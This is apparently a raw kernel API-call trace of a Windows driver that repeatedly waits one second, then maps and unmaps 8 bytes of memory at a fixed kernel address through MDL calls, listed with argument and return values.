| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0004cbc3820 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0004cbc3820, MemoryDescriptorList_unk_out = 0xffffe0004cbc3820 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0004cbc3820, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00045a5da40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00045a5da40, MemoryDescriptorList_unk = 0xffffe0004cbc3820 |
| IoFreeMdl | Mdl_unk = 0xffffe0004cbc3820 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c37eba0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c37eba0, MemoryDescriptorList_unk_out = 0xffffe0003c37eba0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c37eba0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00045ba6a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00045ba6a40, MemoryDescriptorList_unk = 0xffffe0003c37eba0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c37eba0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9bd520 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9bd520, MemoryDescriptorList_unk_out = 0xffffe0003b9bd520 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9bd520, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00049b8da40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00049b8da40, MemoryDescriptorList_unk = 0xffffe0003b9bd520 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9bd520 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9bd520 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9bd520, MemoryDescriptorList_unk_out = 0xffffe0003b9bd520 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9bd520, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00028f98a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00028f98a40, MemoryDescriptorList_unk = 0xffffe0003b9bd520 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9bd520 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bcb2440 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bcb2440, MemoryDescriptorList_unk_out = 0xffffe0003bcb2440 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029479a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029479a40, MemoryDescriptorList_unk = 0xffffe0003bcb2440 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bcb2440 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c0f9c50 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, MemoryDescriptorList_unk_out = 0xffffe0003c0f9c50 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029627a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029627a40, MemoryDescriptorList_unk = 0xffffe0003c0f9c50 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c0f9c50 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c0f9c50 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, MemoryDescriptorList_unk_out = 0xffffe0003c0f9c50 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029710a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029710a40, MemoryDescriptorList_unk = 0xffffe0003c0f9c50 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c0f9c50 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c0f9c50 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, MemoryDescriptorList_unk_out = 0xffffe0003c0f9c50 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002971ea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002971ea40, MemoryDescriptorList_unk = 0xffffe0003c0f9c50 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c0f9c50 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c0f9c50 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, MemoryDescriptorList_unk_out = 0xffffe0003c0f9c50 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029739a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029739a40, MemoryDescriptorList_unk = 0xffffe0003c0f9c50 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c0f9c50 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c0f9c50 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, MemoryDescriptorList_unk_out = 0xffffe0003c0f9c50 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029a18a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029a18a40, MemoryDescriptorList_unk = 0xffffe0003c0f9c50 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c0f9c50 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c0f9c50 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, MemoryDescriptorList_unk_out = 0xffffe0003c0f9c50 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029a24a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029a24a40, MemoryDescriptorList_unk = 0xffffe0003c0f9c50 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c0f9c50 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029a2ba40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029a2ba40, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029a42a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029a42a40, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bcb2440 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bcb2440, MemoryDescriptorList_unk_out = 0xffffe0003bcb2440 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029cdda40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029cdda40, MemoryDescriptorList_unk = 0xffffe0003bcb2440 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bcb2440 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029e21a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029e21a40, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a0f3a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a0f3a40, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a0fba40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a0fba40, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a109a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a109a40, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a110a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a110a40, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a119a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a119a40, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bcb2440 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bcb2440, MemoryDescriptorList_unk_out = 0xffffe0003bcb2440 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a256a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a256a40, MemoryDescriptorList_unk = 0xffffe0003bcb2440 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bcb2440 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a4d8a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a4d8a40, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c306640 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c306640, MemoryDescriptorList_unk_out = 0xffffe0003c306640 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c306640, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a4fea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a4fea40, MemoryDescriptorList_unk = 0xffffe0003c306640 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c306640 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c306640 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c306640, MemoryDescriptorList_unk_out = 0xffffe0003c306640 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c306640, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a65fa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a65fa40, MemoryDescriptorList_unk = 0xffffe0003c306640 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c306640 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd56930 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd56930, MemoryDescriptorList_unk_out = 0xffffe0003bd56930 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd56930, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a68aa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a68aa40, MemoryDescriptorList_unk = 0xffffe0003bd56930 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd56930 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a69aa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a69aa40, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a897a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a897a40, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a89ba40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a89ba40, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
